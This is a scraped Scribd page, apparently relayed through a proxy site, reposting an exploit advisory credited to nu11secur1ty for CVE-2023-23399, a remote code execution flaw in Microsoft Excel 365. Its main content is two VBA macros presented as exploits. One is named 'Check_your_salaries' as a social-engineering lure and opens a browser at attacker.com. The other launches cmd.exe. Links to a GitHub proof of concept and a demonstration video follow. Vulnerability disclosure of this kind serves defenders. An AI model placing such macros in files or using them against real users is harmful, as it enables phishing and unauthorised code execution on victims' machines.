Scribd Logo
Upload

Welcome to Scribd!

  • 35 views

    SM EXcel 365 Rce 51328

    Uploaded by

    scribdfoo1
    This document summarizes a remote code execution vulnerability in Microsoft Excel 365 MSO version 2302. The vulnerability allows a malicious user to exploit victims remotely by convincing them to open a specially crafted file. The document provides two VBA code examples that could be used to exploit the vulnerability by opening a malicious website or executing commands on the victim's computer. Proof of concept and exploit code is available on GitHub and Streamable to demonstrate the vulnerability.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd

    SM EXcel 365 Rce 51328

    Uploaded by

    scribdfoo1
    35 views1 page
    This document summarizes a remote code execution vulnerability in Microsoft Excel 365 MSO version 2302. The vulnerability allows a malicious user to exploit victims remotely by convincing them to open a specially crafted file. The document provides two VBA code examples that could be used to exploit the vulnerability by opening a malicious website or executing commands on the victim's computer. Proof of concept and exploit code is available on GitHub and Streamable to demonstrate the vulnerability.

    Original Title

    SM-EXcel-365-rce-51328

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    This document summarizes a remote code execution vulnerability in Microsoft Excel 365 MSO version 2302. The vulnerability allows a malicious user to exploit victims remotely by convincing them to open a specially crafted file. The document provides two VBA code examples that could be used to exploit the vulnerability by opening a malicious website or executing commands on the victim's computer. Proof of concept and exploit code is available on GitHub and Streamable to demonstrate the vulnerability.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Download as txt, pdf, or txt
    35 views1 page

    SM EXcel 365 Rce 51328

    Uploaded by

    scribdfoo1
    This document summarizes a remote code execution vulnerability in Microsoft Excel 365 MSO version 2302. The vulnerability allows a malicious user to exploit victims remotely by convincing them to open a specially crafted file. The document provides two VBA code examples that could be used to exploit the vulnerability by opening a malicious website or executing commands on the victim's computer. Proof of concept and exploit code is available on GitHub and Streamable to demonstrate the vulnerability.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Download as txt, pdf, or txt
    You are on page 1of 1

    ## Exploit Title: Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.

    20186) 64-
    bit - Remote Code Execution (RCE)
    ## Exploit Author: nu11secur1ty
    ## Date: 03.16.2023
    ## Vendor: https://www.microsoft.com/en-us/microsoft-365/excel
    ## Software: https://www.microsoft.com/en-us/microsoft-365/excel
    ## Reference: https://www.invicti.com/learn/remote-code-execution-rce/
    ## CVE ID: CVE-2023-23399

    ## Description:
    The malicious user can exploit the victim's PC remotely.
    For example, when the score indicates that the Attack Vector is Local
    and User Interaction is Required, this could describe an exploit in
    which an attacker, through social engineering, convinces a victim to
    download and open a specially crafted file from a website which leads
    to a local attack on their computer.

    STATUS: HIGH Vulnerability

    [+]Exploit0:
    ```
    Sub Check_your_salaries()
    CreateObject("Shell.Application").ShellExecute
    "microsoft-edge:https://attacker.com"
    End Sub
    ```
    [+]Exploit1:
    ```
    Sub cmd()
    Dim Program As String
    Dim TaskID As Double
    On Error Resume Next
    Program = "cmd.exe"
    TaskID = Shell(Program, 1)
    If Err <> 0 Then
    MsgBox "Can't start " & Program
    End If
    End Sub
    ```

    ## Reproduce:
    [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-23399)

    ## Proof and Exploit:


    [href](https://streamable.com/dnyfx0)

    ## Time spend:
    03:00:00

    --
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at
    https://packetstormsecurity.com/https://cve.mitre.org/index.html and
    https://www.exploit-db.com/
    home page: https://www.nu11secur1ty.com/
    hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
    nu11secur1ty <http://nu11secur1ty.com/>

    You might also like

    pFad - Phonifier reborn

    Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

    Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


    Alternative Proxies:

    Alternative Proxy

    pFad Proxy

    pFad v3 Proxy

    pFad v4 Proxy